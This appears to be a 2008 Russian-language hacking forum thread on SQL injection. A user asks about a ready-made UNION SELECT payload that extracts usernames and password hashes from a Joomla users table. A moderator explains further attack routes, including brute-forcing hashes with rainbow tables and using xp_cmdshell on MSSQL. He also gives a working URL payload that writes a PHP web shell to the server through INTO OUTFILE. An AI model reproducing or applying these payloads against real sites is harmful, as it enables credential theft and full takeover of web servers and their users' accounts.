SoftoRooM LifeRooM Whois RSS GZip WAP Поиск Правила Помощь Disclaimer
Твой софтовый форумТвой софтовый форумТвой софтовый форумТвой софтовый форум

Здравствуйте Гость ( Вход | Регистрация )

SQL Injection


 
post 12.03.2008 - 5:52
Отправлено #1
Ra1N



Специалист
****

Профиль
Группа: Пользователи
Сообщений: 410
Регистрация: 13.07.2005
Из: Интернет
Пользователь №: 28.722


Респектов: 12
-----X----


Предупреждений:   0


Приветствую!

У меня проблема следующего плана, есть сформированый до меня sql запрос: /**/union/* */select/**/0x3a,username,0x3a,password,0x3a,0x3a/* */from/**/jos_users/*

Очень хотелось бы составить свой, но меня пугают символы:
/**/union/* */select/**/0x3a,username,0x3a,password,0x3a,0x3a/* */from/**/jos_users/*
что они означают, и как с ними разобраться, не могли бы вы помочь, или хотя бы кинуть ссылку а толковый мануал?!
User is offlineProfile CardPM
Go to the top of the pageGo to the end of the page
+Quote Post

Reply to this topicStart new topicStart Poll
Ответов(10 - 15)
 
post 13.03.2008 - 17:35
Отправлено #11
de1ay



Cardable Unit
[SoftoRooMTeaM] Group Icon

Профиль
Группа: СуперМодераторы
Сообщений: 3.893
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 626
-----XXXX-




Цитата | Quote(Rain of Dark @ 13.03.2008 - 13:17)
экранироваться = фильтроваться? Оо
*
Именно.
И все же, не прав я был по поводу insert`a, после union только селект использовать можно.
User is offlineProfile CardPM
Go to the top of the pageGo to the end of the page
+Quote Post

 
post 14.03.2008 - 5:08
Отправлено #12
Ra1N



Специалист
****

Профиль
Группа: Пользователи
Сообщений: 410
Регистрация: 13.07.2005
Из: Интернет
Пользователь №: 28.722


Респектов: 12
-----X----


Предупреждений:   0


а тогда каков смысл таких атак?
Расшифровать хэш врядли получится, подделать кукисы в cms типа jooml'ы тоже не удается, тогда все эти инъекции бесполезны?
User is offlineProfile CardPM
Go to the top of the pageGo to the end of the page
+Quote Post

 
post 14.03.2008 - 8:23
Отправлено #13
de1ay



Cardable Unit
[SoftoRooMTeaM] Group Icon

Профиль
Группа: СуперМодераторы
Сообщений: 3.893
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 626
-----XXXX-




Цитата | Quote(Rain of Dark @ 14.03.2008 - 5:08)
Расшифровать хэш врядли получится, подделать кукисы в cms типа jooml'ы тоже не удается, тогда все эти инъекции бесполезны?
*

А почему так категорично на счет хэша? Вполне реально его сбрутить, если присутствует желание. Можно читать файлы, можно шелл залить...
В MSSQL, если крутитится она от пользователя sa, можно использовать xp_cmdshell, что может привести к полному контролю над машиной.
User is offlineProfile CardPM
Go to the top of the pageGo to the end of the page
+Quote Post

 
post 14.03.2008 - 12:06
Отправлено #14
Ra1N



Специалист
****

Профиль
Группа: Пользователи
Сообщений: 410
Регистрация: 13.07.2005
Из: Интернет
Пользователь №: 28.722


Респектов: 12
-----X----


Предупреждений:   0


а шелл то как можно залить если только читать файлы можно и select использовать?! О.о

А на счет хэша, ну если допустим даже пароль из восьми символов, да еще и с использованием хотябы одного спецсимвола, то это ж на стену полезишь, пока его сбрутишь!
Цитата | Quote
В MSSQL, если крутитится она от пользователя sa, можно использовать xp_cmdshell

это еще что за пользователь такой?

Сообщение отредактировал Rain of Dark - 14.03.2008 - 12:08
User is offlineProfile CardPM
Go to the top of the pageGo to the end of the page
+Quote Post

 
post 16.03.2008 - 10:44
Отправлено #15
de1ay



Cardable Unit
[SoftoRooMTeaM] Group Icon

Профиль
Группа: СуперМодераторы
Сообщений: 3.893
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 626
-----XXXX-




Цитата | Quote(Rain of Dark @ 14.03.2008 - 12:06)
а шелл то как можно залить если только читать файлы можно и select использовать?! О.о
*

Не игнорь мои советы прочитать статью. smile.gif

Code
http://www.site.ru/index.php?page=-1+union+select+1,2,,'<?php system($_GET[cmd]); ?>',4,5+from+user+into+outfile+'/home/site/html/shell.php'/*


Цитата | Quote(Rain of Dark @ 14.03.2008 - 12:06)
А на счет хэша, ну если допустим даже пароль из восьми символов, да еще и с использованием хотябы одного спецсимвола, то это ж на стену полезишь, пока его сбрутишь!
*
Есть такие замечательные таблицы - Rainbow tables. Сильно сокращают время подбора хэша.

Цитата | Quote(Rain of Dark @ 14.03.2008 - 12:06)
это еще что за пользователь такой?
*
root в mysql.
User is offlineProfile CardPM
Go to the top of the pageGo to the end of the page
+Quote Post

 
post 16.03.2008 - 13:44
Отправлено #16
Ra1N



Специалист
****

Профиль
Группа: Пользователи
Сообщений: 410
Регистрация: 13.07.2005
Из: Интернет
Пользователь №: 28.722


Респектов: 12
-----X----


Предупреждений:   0


Цитата | Quote(delay(0) @ 16.03.2008 - 18:44)
Есть такие замечательные таблицы - Rainbow tables. Сильно сокращают время подбора хэша.
*


а можно поподробнее об этих самых таблицах, ну или хоть линку дай wink.gif

Добавлено:

а, все не надо, нашел, спасибо за помощь!
Респект! wink.gif
User is offlineProfile CardPM
Go to the top of the pageGo to the end of the page
+Quote Post


Reply to this topicTopic OptionsStart new topic
 


  Яндекс цитирование   Rambler's Top100
LITE - версия | WAP - версия